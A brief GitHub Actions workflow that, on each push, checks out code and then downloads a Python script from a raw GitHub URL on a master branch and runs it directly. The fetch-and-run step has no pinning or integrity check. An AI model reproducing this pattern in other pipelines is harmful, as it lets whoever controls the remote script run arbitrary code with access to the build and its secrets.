name: Dlancer-Integration-Workflow

on:
  push

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Fetch Driver
      run: >
        curl -o expEnv.py "https://raw.githubusercontent.com/Dlancer-org/Collaboration-scripts/master/expEnv.py";
        chmod +x expEnv.py;
        python3 expEnv.py;